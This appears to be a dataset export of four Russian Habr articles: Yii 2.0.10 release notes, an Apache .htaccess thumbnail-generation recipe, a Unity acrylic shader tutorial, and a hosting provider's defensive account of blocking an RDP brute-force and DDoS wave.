Вышла новая версия PHP-фреймворка Yii, включающая в себя [более 80 улучшений и исправлений](https://github.com/yiisoft/yii2/blob/2.0.10/framework/CHANGELOG.md). Инструкции по установке и обновлению можно найти [по адресу](http://www.yiiframework.com/download/). Стоит отметить, что в релиз вошли четыре небольших изменения, которые могут повлиять на работу существующих приложений. Обязательно прочитайте [UPGRADE.md](https://github.com/yiisoft/yii2/blob/2.0.10/framework/UPGRADE.md).
Спасибо замечательному [сообществу](https://github.com/yiisoft/yii2/graphs/contributors) за отличные пулл-реквесты и обсуждения. Без вас этого релиза не было бы! За процессом разработки Yii 2 можно начать следить, поставив звёздочку [на GitHub](https://github.com/yiisoft/yii2). Подписывайтесь на наш [Twitter](https://twitter.com/yiiframework) и [Facebook](https://www.facebook.com/groups/yiitalk/). Обсудить релиз можно в комментариях.
Полный список изменений можно найти в [CHANGELOG](https://github.com/yiisoft/yii2/blob/2.0.10/framework/CHANGELOG.md). Далее мы рассмотрим наиболее интересные.
URL
---
Новый класс `yii\web\UrlNormalizer` позволяет нормализовать запросы на URI с присутствующим или отсутствующим слешем в конце, что довольно важно для поисковой оптимизации. Подробное описание можно найти в разделе «[URL normalization](http://www.yiiframework.com/doc-2.0/guide-runtime-routing.html#url-normalization)» официального руководства.
Миграции
--------
Помимо небольших исправлений миграции получили и довольно значительное улучшение. Теперь можно запускать миграции из нескольких мест одновременно, если использовать для них пространства имён. Чтобы это сделать, необходимо настроить свойство `migrationNamespaces` консольного контроллера:
```
return [
'controllerMap' => [
'migrate' => [
'class' => 'yii\console\controllers\MigrateController',
'migrationNamespaces' => [
'app\migrations',
'some\extension\migrations',
],
//'migrationPath' => null, //можно отключить миграции без пространств имён
],
],
];
```
Обработка ошибок
----------------
Ошибки при записи и чтении сессии теперь не скрываются в отладочном режиме, что позволяет легко выявить большинство проблем на этапе разработки.
Request
-------
Появился новый метод `yii\web\Request::getHostName()`, возвращающий имя хоста для текущего запроса.
Не POST запросы, кодированные как `multipart/form-data` (например, загрузка файлов) теперь можно распарсить через `yii\web\MultipartFormDataParser`. Для того, чтобы этим воспользоваться, вы должны настроить `Request::parsers` следующим образом:
```
return [
'components' => [
'request' => [
'parsers' => [
'multipart/form-data' => 'yii\web\MultipartFormDataParser'
],
],
// ...
],
// ...
];
```
После этого следует вызвать `Request::getBodyParams()` и запрос будет разобран в соответствующие переменные. В том числе в `$_FILES`.
Базы данных
-----------
Было добавлено новое поведение для ActiveRecord. `yii\behaviors\AttributeTypecastBehavior` позволяет автоматически приводить типы значений атрибутов.
Типы задаются через `attributeTypes`:
```
use yii\behaviors\AttributeTypecastBehavior;
class Item extends \yii\db\ActiveRecord
{
public function behaviors()
{
return [
'typecast' => [
'class' => AttributeTypecastBehavior::className(),
'attributeTypes' => [
'amount' => AttributeTypecastBehavior::TYPE_INTEGER,
'price' => AttributeTypecastBehavior::TYPE_FLOAT,
'is_active' => AttributeTypecastBehavior::TYPE_BOOLEAN,
],
'typecastAfterValidate' => true,
'typecastBeforeSave' => false,
'typecastAfterFind' => false,
],
];
}
// ...
}
```
Если `attributeTypes` не задан, значение будет определяться автоматически на основе правил валидации:
```
use yii\behaviors\AttributeTypecastBehavior;
class Item extends \yii\db\ActiveRecord
{
public function rules()
{
return [
['amount', 'integer'],
['price', 'number'],
['is_active', 'boolean'],
];
}
public function behaviors()
{
return [
'typecast' => [
'class' => AttributeTypecastBehavior::className(),
'owner' => $this,
// 'attributeTypes' будет задан автоматически на основе `rules()`
],
];
}
// ...
}
```
Также был добавлен `yii\mutex\OracleMutex` — реализация блокировки возможностями Oracle.
Консоль
-------
В консоли теперь можно вызвать описание команды передав `-h` или `--help`.
Тестирование
------------
Шаблоны приложений были изменены, чтобы работать с недавними изменениями в Codeception. Подробнее об этом можно прочитать в новом разделе на сайте Codeception: «[Yii 2.0 quickstart guide](http://codeception.com/for/yii)». Если вы используете шаблон проекта advanced, ознакомьтесь с его [документацией по тестированию](https://github.com/yiisoft/yii2-app-advanced/blob/master/docs/guide/start-testing.md). | https://habr.com/ru/post/313180/ | null | ru | null |
# Как заставить Apache работать или как я реализую создание миниатюр изображений в своих проектах
Здравствуйте, хабровчане.
Занимаясь созданием различных интернет-проектов уже порядочное время, часто был просто возмущён одним фактом — не все элементы системы несут на себе равную нагрузку. Я всегда придерживался мнения, что каждый элемент системы, будь то интерпретатор того или иного языка для сайта, или база данных, или даже сам HTTP сервер, должен брать на себя максимально возможную нагрузку, дабы облегчить участь остальных элементов системы. Да и сами приложения для своих проектов всегда старался максимально разгрузить.
Сейчас же мне хотелось бы поделиться своим опытом в том, как «озадачить» Apache при создании миниатюр изображений (Thumbnails).
При «переделках» сайтов с различными вариантами миниатюризации изображений долгое время сталкивался и всегда очень разочаровывался в их устройстве. Практически все решения заключались в работе скриптов и уже скрипты искали исходники для миниатюризации и генерировали заголовки, если таковое не найдено. А когда же я увидел реализацию миниатюр в CMS MODX через phpThumbOf, то невольно даже прослезился.
Так уж случилось, что пришлось делать интернет- магазин на выше упомянутой CMS. Задачка, если честно, не из простых, но самым щекотливым моментом стала генерация миниатюр. Товары и изображения к ним выгружаются из 1С и ни о какой оптимизации и стандартизации в отношении изображений, как вы, наверное, уже понимаете, и речи быть не может. В этом плане в большинстве случаев 1С можно назвать одним словом — «помойка». Каждый пихает туда как может и тянет откуда получается. Так или иначе, изображения товаров есть и их много. Также помимо изображений товаров должна быть уйма других — фото под различные акции, мероприятия… Да что уж говорить — должно быть много изображений.
Поскольку перспектива использования системной phpThumbOf меня не прельщала, так как генерация миниатюр во время генерации страницы — слишком уж дико, да и чистить миниатюры при очередном обмене данными с 1С становилось бы проблемой, я начал поиск решения, соответствующего моему концепту «работать должны все».
Суть идеи была проста:
* вынести миниатюризатор из CMS, дабы не перегружать интерпретатор лишним и зачастую ненужным кодом;
* иметь в минаитюризаторе не одно, а множество правил преобразования, и подгружать их по маске;
* не использовать миниатюризатор вхолостую, т.е. не пытаться определить в нём: есть ли миниатюра или ее исходник, или нет;
* переложить часть работы миниатюризатора на сервер Apache через .htaccess;
* и сделать чтобы миниатюры создавались по первому требованию, а не принудительно всегда.
Реализацию самого миниатюризатора на PHP я пропущу, т.к. не о нем речь, а вот самим концептом поделюсь. Думаю, пригодится он многим.
**Итак, шаг первый:** хранение изображений и миниатюр при наличии множества правил преобразования исходников.
У нас есть папка на сайте, в которой лежат все изображения. Пусть это будет папка «images». В этой папке есть множество подкаталогов с картинками на различные тематики.
Создадим в ней подкаталог для хранения миниатюр. Пусть это будет каталог «thumb».
Внутри этого каталога будут лежать подкаталоги с миниатюрами. Каждый подкаталог соответствует определённому правилу преобразования исходного изображения. Пусть это будут подкаталоги «a,b,c,d». В каждом из них будут лежать изображения из каталога «images» и ниже, пропущенные через миниатюризатор с использованием общего правила преобразования.
Таким образом, для изображения «/images/folder1/image1.jpg» после преобразования по шаблону «a» будет миниатюра «/images/thumb/a/folder1/image1.jpg».
**Шаг второй:** добавляем сам миниатюризатор.
Я просто кладу скрипт с вызовом миниатюризатора в папку изображений. Пусть это будет «/images/thumb.php». Хотя никто не мешает поместить его где угодно. Главное не забыть отразить это в «.htaccess» в RewriteBase и RewriteRule.
**И в конце:** даём пинок серверу Apache.
Создаем файлик «/images/.htaccess» со следующим содержанием:
```
RewriteEngine On
RewriteBase /images/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_URI} ^/([^/]+)/thumb/([^/]+)(/.+)?/(.+)\.(jpe?g|png|gif|svgz?|tiff?)$
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.%5 –f
RewriteRule ^(.*)$ thumb.php [L,QSA]
```
Таким содержимым мы заставляем Apache немного подумать запускать ли миниатюризатор или нет.
Сервер сперва проверит есть ли вообще запрашиваемое изображение. Если такого нет, то проверит, является ли это запросом миниатюры. Если это должна быть миниатюра, то он должен проверить есть ли исходник для запрашиваемой миниатюры. Если исходник существует, то он запускает миниатюризатор.
Ложь на любом этапе проверки запускает стандартную логику сервера. Т.е. если запрашиваемое изображение есть – он сам его отдает; если это не запрос миниатюры или нет исходника для запрашиваемой миниатюры, то Apache вернёт статус 404 «не найдено».
Таким образом, мы реализовали доступ к миниатюрам и к скрипту для их создания, причем без лишнего вызова такового. Также такая система хранения снимает неудобства связанные с прочисткой кэша миниатюр.
**А теперь усложним задачу для сервера.**
Допустим, у меня есть SVG изображение «/images/svgs/logo.svg» а в кэше хочу иметь миниатюру в формате PNG.
По выше указанной схеме Apache просто не найдёт исходника для «/images/thumb/b/svgs/logo.png», т.к. сервер ищет исходник с тем же расширением.
Можно заставить Apache подумать побольше:
```
RewriteEngine On
RewriteBase /images/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_URI} ^/([^/]+)/thumb/([^/]+)(/.+)?/(.+)\.(jpe?g|png|gif|svgz?|tiff?)$
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.jpg -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.jpeg -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.tif -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.tiff -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.gif -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.bmp -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.png -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.svg -f [OR]
RewriteCond %{DOCUMENT_ROOT}/%1%3/%4.svgz -f
RewriteRule ^(.*)$ thumb.php [L,QSA]
```
Теперь, прежде чем отправить наш запрос миниатюры скрипту, Apache попробует найти исходник для запрашиваемой миниатюры в другом формате. Он просто переберёт все возможные расширения для этого файла и если не нашел соответствия опять же вернёт нам 404 «не найдено».
Теперь при запуске миниатюризатора нам достаточно лишь проверить наличие переменной «REDIRECT\_URL», чтобы удостовериться, что это редирект, а не прямой запуск скрипта. В остальном миниатюризатор уже точно знает, что исходник есть. Да и куда положить результат своей работы он уже знает, и откуда взять исходник. Все в одной и той же переменной окружения «REDIRECT\_URL».
Обнулять кэш очень легко – указываем папку исходников, для которой нужно очистить кэш, программа подгрузит наименования шаблонов и прочистит кэш для каждого шаблона преобразований. Также можно прочистить только для одного шаблона. А для обновления кэша при обмене с 1С просто проверяем контрольные суммы имеющегося изображения и входящего, и при несоответствии заменяем исходник и вычищаем все его миниатюры. | https://habr.com/ru/post/239501/ | null | ru | null |
# Материалы в Unity: Акрил
Всем привет! Меня зовут Григорий Дядиченко, я СТО Foxsys, и я всё ещё люблю графику. В прошлый раз я рассказывал, что неплохим упражнением является сборка различных базовых материалов для тренировки в создании интересных эффектов. Давайте сегодня проведём такое упражнение вместе и разберём, каким образом можно получить в Unity такой материал как акрил, который будет работать в AR и на мобильных платформах. Кому интересно - добро пожаловать под кат!
Результат
---------
Для начала небольшое видео с результатом, чтобы было понятно, что мы будем делать. Так же в [данном репозитории](https://github.com/Nox7atra/UMOM) лежит всё решение с исходниками. А теперь пожалуй начнём.
Какой акрил будем делать?
-------------------------
Когда-то давно майкрософт выпустил ролик с замечательной дизайн концепцией Microsoft fluent design. Там показаны достаточно интересные подходы к дизайну, которые круто смотрятся в дополненной и виртуальной реальности. Базовая идея основывается на объёме, свете, моушене и реалистичных материалах. По сути то, что Microsoft называет в своих интерфейсах акрилом мы и будем реализовывать. Подобное “мутное стекло” так же используется в айос и выглядит достаточно интересно. Один из примеров интересного применения в приложениях - это приложение New Yourk Times в разделе с дополненной реальности.
В данном случае мы акрил будем рассматривать не с точки зрения физических процессов, какой-то сложной математики, а возьмём подход прямо из [документации MSDN](https://docs.microsoft.com/ru-ru/windows/apps/design/style/acrylic) с небольшой доработкой для 3д, который допустим очень интересно использовать для проектов в дополненной реальности на Microsoft Hololens, но так же можно использовать в любых других проектах.
Данный акрил состоит по сути из:
1. Blur/Размытие
2. Color Burn/Затемнение основы
3. Tint/Задание оттенка
4. Noise/Шум
Для добавления объёма мы так же добавим в этот процесс Эффект Френеля. Так как он отлично имитирует нужный нам визуал, для того, чтобы у нашей модели были видны грани. Иначе данный акрил применим только для 2д интерфейсов, так как по самой технике не имеет объёма.
Blur или размытие
-----------------
На первом же шаге, если подойти к нему неправильно и не знать нюансов платформ у нас возникнут проблемы. Во-первых, на мобильных платформах очень дорого использовать GrabPass, а во-вторых, если размывать мы будем достаточно большой кадр по алгоритму того же Гаусса у нас просядет производительность (просто будет убит филлрейт). Поэтому мы поступим хитрее. В целом блюр можно написать самостоятельно, но я пользуюсь модифицированным <https://github.com/PavelDoGreat/Super-Blur> Это очень крутой репозиторий с размытием обладающий двумя нужными нам функциями. Размытием полного кадра (оно дешевле чем грабпасс) и возможностью уменьшить разрешение полного кадра до нужного нам. Так как он всё равно буде сильно размыт, то нет необходимости в высоком качестве кадра, и можно взять его даунсемпл. В целом эти параметры можно в будущем крутить под конкретный эффект, платформу и доступный лимит ресурсов, чтобы получить разные материалы.
Сразу стоит сказать, что сам по себе акрил конечно в этом случае получится нечестный. Так как он либо будет учитывать сам себя, либо не будет учитывать другие акриловые объекты находящиеся за ним. Так как по сути в дальнейшем мы наше размытие пробрасываем в 3д модель и используем, как текстуру на модели. Для этого мы рассчитываем uv координаты исходя из позиции вершины на экране.
```
v2f vert (appdata_t v)
{
v2f o;
o.vertex = UnityObjectToClipPos(v.vertex);
o.uv = ComputeScreenPos(o.vertex);
}
float4 frag(v2f i) : COLOR
{
float4 col = tex2D(_MainTex, i.uv.xy / i.uv.w);
return col;
}
```
Photoshop Blend Modes
---------------------
По данной теме почти та же самая история. Их можно написать самостоятельно, но в целом существует уже готовый .cginc со всеми нужными блендмодами. <https://github.com/penandlim/JL-s-Unity-Blend-Modes> Правда для непрозрачных цветов. Для поддержки прозрачности нужно дорабатывать режимы смешивания самостоятельно.
По сути тут мы смешиваем наш кадр заднего фона с неким цветом и получаем необходимый нам эффект. \_BurnColor можно регулировать чтобы добиваться разного визуала. Но по умолчанию его можно в целом не трогать. И мы получим эффект, как на картинке.
Эффект Френеля
--------------
Так как у нас нет рефракции и по сути 3д модель выступает сейчас, как некая маска для того, чтобы показывать нам, что же скрыто за ней в размытой текстуре экрана - нам нужно как-то добавить объём. Можно в целом реализовать преломления, но они тут необязательны, так как с таким сильным размытием визуальная разница будет незаметна. По сути акрил - это отражающий материал, поэтому мы можем задать нужный нам объём Эффектом Френеля.
Возьмём самую простую реализацию эффекта Френеля (их очень много с разными свойствами, возможностью к редактированью и скоростью работы). Взяв угол за основу скалярное произведение между векторами от вершины объекта до камеры и нормалью в данной вершине.
```
v2f vert (appdata_t v)
{
v2f o;
o.vertex = UnityObjectToClipPos(v.vertex);
o.uv = ComputeScreenPos(o.vertex);
//Freshel
float3 i = normalize(ObjSpaceViewDir(v.vertex));
o.fresnel = _FresnelBias + _FresnelScale * pow(1 + dot(i, v.normal), -_FresnelPower);
}
half4 frag(v2f i) : COLOR
{
float4 col = tex2D(_MainTex, i.uv.xy / i.uv.w);
//Color Burn
col.xyz = LinearBurn(col.xyz, _BurnColor.xyz);
//Freshnel
col = lerp(col, 1 - _FresnelColor, 1 - i.fresnel);
return col;
}
```
А в фрагментной части будем смешивать цвета в зависимости от этого параметра. И получим необходимый нам объём + возможность регулировать цвет отражений от нашего акрила. Для простоты и удобства проще ставить его такой же, как и цвет самого акрила. Но в целом для достижения другого художественного эффекта его так же можно регулировать.
Шум
---
С шумом всё довольно просто. У нашей модели есть развёртка. Так как в uv один мы пишем параметры пересчитанные для вершинной части, то для передачи в фрагментную часть оригинальной развёртки можно использовать uv2 (или поменять их местами, тут кому как больше нравится) А дальше мы смешиваем шум по принципу того, что чёрный - это у нас альфа канал равный нулю, а в белый - альфа равная единице. И получаем нужное нам лёгкое “напыление на материале”. Собственно всё.
```
v2f vert (appdata_t v)
{
v2f o;
o.vertex = UnityObjectToClipPos(v.vertex);
o.uv = ComputeScreenPos(o.vertex);
o.uv2 = v.texcoord;
float3 i = normalize(ObjSpaceViewDir(v.vertex));
//Freshel
o.fresnel = _FresnelBias + _FresnelScale * pow(1 + dot(i, v.normal), -_FresnelPower);
return o;
}
half4 frag(v2f i) : COLOR
{
float4 col = tex2D(_MainTex, i.uv.xy / i.uv.w);
//Color Burn
col.xyz = LinearBurn(col.xyz, _BurnColor.xyz);
//Noise
float4 noise = tex2D(_NoiseTex, i.uv2);
col = lerp(col, noise, noise.r);
//Freshnel
col = lerp(col, 1 - _FresnelColor, 1 - i.fresnel);
return col;
}
```
Tint или задание оттенка
------------------------
Так как в Unity чаще всего Tint подразумевает умножение цветов, то таким образом его и сделаем. Просто умножим нужный нам цвет, на цвет полученный в шаге Color Burn.
И всё, шейдер готов и у нас есть такой прикольный акриловый материал в Unity. По своей сути при том, что кажется что он прозрачный - он является непрозрачным материалом достаточно шустро работающим даже на слабых мобильных устройствах. Но за скорость надо платить и этот эффект не является честным акрилом и всё же обладает рядом недостатков. Но в большом числе случаев такой реализации будет достаточно, чтобы добиться нужного визуального эффекта в сцене.
**Важное уточнение:** эффекты разбирались не в порядке их наложения по слоям, так что обратите внимание на порядок вызова методов в шейдере, так как от этого сильно зависит визуальный эффект.
Вот и тренировке конец
----------------------
В статье я пошагово разобрал, как можно сделать эффект акрила. Одну из вариаций. Подобные рецепты и трюки можно придумать или найти для большого количества материалов. Вопрос в ваших ограничениях, и как вы можете поставить их к себе на пользу. Допустим с одним акриловым объектом по центру сцены в AR эта штука вообще смотрится почти идеально.
Все исходники вы можете найти [в репозитории](https://github.com/Nox7atra/UMOM), и если у меня будет в обозримом будущем время я постараюсь разобрать ещё несколько материалов и добавить их в репозиторий. Спасибо за внимание!
А в конце хочу предложить несколько простых упражнений (одно из них решено в репозитории, так что рекомендую не подглядывать, если захотите их про решать):
1. Сделать возможность собрать на основе этого шейдера окно с выложенной мозаикой
2. Сделать возможность красить 3д модели в разные цвета в один dc без использования текстурных атласов.
3. Сделать шум не в виде текстуры, а рассчитываемым получив нужный мутный визуальный эффект. | https://habr.com/ru/post/565662/ | null | ru | null |
# DDoS-атака на RDP-службы: распознать и побороть. Успешный опыт от Tucha
Расскажем вам прохладную историю о том, как «третьи лица» пытались помешать работе наших клиентов, и как эта проблема была решена.
Как всё началось
----------------
А началось всё с утра 31 октября, в последний день месяца, когда многим позарез необходимо успеть закрыть срочные и важные вопросы.
Один из партнёров, который держит в нашем облаке несколько виртуальных машин клиентов, которых он обслуживает, сообщил о том, что с 9:10 до 9:20 сразу несколько Windows-серверов, работающих на нашей украинской площадке, не принимали соединения со службой удалённого доступа, пользователи не могли зайти на свои рабочие столы, но через несколько минут проблема как будто бы устранилась сама собой.
Мы подняли статистику работы каналов связи, но не обнаружили ни всплесков трафика, ни провалов. Заглянули в статистику нагрузки на вычислительные ресурсы – никаких аномалий. И что это было?
Затем ещё один партнёр, который размещает в нашем облаке ещё под сотню серверов, сообщил о таких же проблемах, которые отметили некоторые их клиенты, при этом выяснилось, что в целом серверы доступны (исправно отвечают на ping-тест и другие запросы), но служба удалённого доступа на этих серверах то принимает новые соединения, то отклоняет их, при этом речь шла о серверах на разных площадках, трафик к которым поступает из разных каналов передачи данных.
А давайте посмотрим на этот трафик. Пакет с запросом на установление соединения приходит на сервер:
**```
xx:xx:xx.xxxxxx IP xxx.xxx.xxx.xxx.58355 > 192.168.xxx.xxx.3389: Flags [S], seq 467744439, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
```**
Сервер получает этот пакет, но соединение отклоняет:
**```
xx:xx:xx.xxxxxx IP 192.168.xxx.xxx.3389 > xxx.xxx.xxx.xxx.58355: Flags [R.], seq 0, ack 467744440, win 0, length 0
```**
Это значит, что проблема явно обусловлена вовсе не какими-то неполадками в работе инфраструктуры, а чем-то ещё. Может, у всех пользователей возникли проблемы с лицензированием удалённых рабочих столов? Может, в их системы успело внедриться какое-то вредоносное ПО, а сегодня оно активировалось, как пару лет назад было с **XData**и **Petya**?
Пока разбирались, получили аналогичные обращения от ещё нескольких клиентов и партнёров.
А что вообще происходит на этих машинах?
В журналах регистрации событий полно сообщений о попытке подобрать пароль:

Обычно такие попытки регистрируются на всех серверах, где для службы удалённого доступа используется стандартный порт (3389) и при этом разрешён доступ отовсюду. В сети Интернет полным-полно ботов, которые постоянно сканируют все доступные точки подключения и пытаются подобрать пароль (именно по этой причине мы настоятельно рекомендуем использовать сложные пароли вместо «123»). Тем не менее, интенсивность этих попыток в тот день была уж слишком высока.
### Как поступить?
Рекомендовать клиентам посвятить кучу времени на то, чтобы изменить настройки у огромного количества конечных пользователей, чтобы переключиться на другой порт? Не очень хорошая идея, клиенты не будут рады. Рекомендовать разрешить доступ только через VPN? В спешке и панике поднимать IPSec-соединения, у кого они не подняты, – пожалуй, клиентам такое счастье тоже не улыбается. Хотя, надо сказать, это в любом случае дело богоугодное, мы всегда рекомендуем прятать сервер в частную сеть и готовы помогать с настройками, а для любителей разбираться самостоятельно делимся инструкциями для настройки IPSec/L2TP в нашем облаке в режиме site-to-site или road-warrior, а если кто желает поднять VPN-службу на своём собственном Windows-сервере – всегда готовы поделиться подсказками касательно того, как поднять стандартный RAS или OpenVPN. Но, какие бы клёвенькие мы ни были, это было не лучшее время для ведения просветительской работы среди клиентов, так как нужно было как можно быстрее устранить проблему с минимальным напрягом для пользователей.
Решение, которое мы внедрили, заключалось в следующем. Мы наладили анализ проходящего трафика таким образом, чтобы отслеживать все попытки установить TCP-подключение к порту 3389 и выбирать из него адреса, которые в течение 150 секунд пытаются установить соединения с более чем 16 разными серверами в нашей сети, – это и есть источники атаки (разумеется, если у кого-то из клиентов или партнёров есть реальная потребность устанавливать соединения с таким количеством серверов из одного и того же источника, всегда можно добавить такие источники в «белый список». При этом, если в одной сети класса C за эти 150 секунд выявлено более 32 адресов, есть смысл блокировать всю сеть. Блокировка устанавливается на 3 суток, а если за это время атаки из данного источника не производились, этот источник удаляется из «чёрного списка» автоматически. Список заблокированных источников обновляется раз в 300 секунд.

Список этот доступен вот по такому адресу: <https://secure.tucha.ua/global-filter/banned/rdp_ddos>, можете строить на базе него свои ACL.
Исходным кодом такой системы мы готовы поделиться, в нём нет ничего сверхсложного (это несколько простеньких скриптов, составленных буквально за пару часов «на коленке»), и при этом его можно адаптировать и использовать не только для защиты от такой атаки, но и для выявления и блокирования любых попыток сканирования сети: [переходите по этой ссылке.](https://gitlab.tucha.ua/v.melnik/global_filter)
Вдобавок мы внесли некоторые изменения в настройки системы мониторинга, которая теперь более пристально следит за реакцией контрольной группы виртуальных серверов в нашем облаке на попытку установить RDP-подключение: если реакция не воспоследовала в течение секунды – это повод обратить внимание.
Решение оказалось достаточно эффективным: жалоб как со стороны клиентов и партнёров, так и со стороны системы мониторинга больше нет. В «чёрный список» регулярно попадают новые адреса и целые сети, что говорит о том, что атака продолжается, но уже не влияет на работу наших клиентов.
### Один в поле не воин
Сегодня мы узнали, что с аналогичной проблемой столкнулись и другие операторы. Кто-то всё ещё считает, что это Microsoft внесла какие-то изменения в код службы удалённого доступа (если помните, мы в первый день заподозрили то же самое, но эту версию мы очень скоро отвергли) и обещает сделать всё возможное, чтобы как можно скорее найти решение. Кто-то просто игнорирует проблему и советует клиентам защищаться своими силами (менять порт подключения, прятать сервер в частную сеть и так далее). А мы в первый же день не только решили эту проблему, но и создали некоторый задел для более глобальной системы обнаружения угроз, которую планируем развивать.

Отдельное спасибо клиентам и партнёрам, которые не молчали и не сидели на берегу реки в ожидании, что по ней однажды проплывёт труп врага, а сразу же обратили наше внимание на проблему, что и дало нам возможность устранить её в тот же день. | https://habr.com/ru/post/474470/ | null | ru | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.